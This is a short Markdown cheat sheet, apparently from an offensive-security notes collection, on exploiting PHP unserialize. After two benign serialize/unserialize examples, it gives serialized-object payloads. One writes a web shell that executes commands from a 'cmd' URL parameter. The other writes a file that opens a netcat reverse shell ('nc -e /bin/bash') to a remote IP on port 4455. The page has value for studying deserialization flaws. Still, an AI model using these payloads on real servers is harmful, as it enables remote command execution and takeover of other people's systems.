killchain-compendium/Exploits/Web/PHP Deserialize.md

56 lines
1.1 KiB
Markdown

# PHP (De-)Serialization
A basic example of (de-)serialization is the following
Serialize is show in the following snippet.
```php
<?php
$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
$serialized = serialize($plain_text);
file_put_contents('serialized.txt', $serialized);
?>
```
Deserialize is done in the following snippet.
```php
<?php
$serialized = file_get_contents('serialized.txt');
$plain_text = unserialize($serialized);
echo "Title: " . $plain_text['title'];
echo "Content: " . $plain_text['content'];
?>
```
## Unserialize
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
Serialize a form on a website through PHP via
```php
<?php
class FormSubmit {
public $form_file = 'messages.php';
public $message = '<?php
if(isset($_GET[\'cmd\']))
{
system($_GET[\'cmd\']);
}
?>';
}
print urlencode(serialize(new FormSubmit));
?>
```
```php
<?php class file
{
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
}
echo (serialize(new file));
?>
```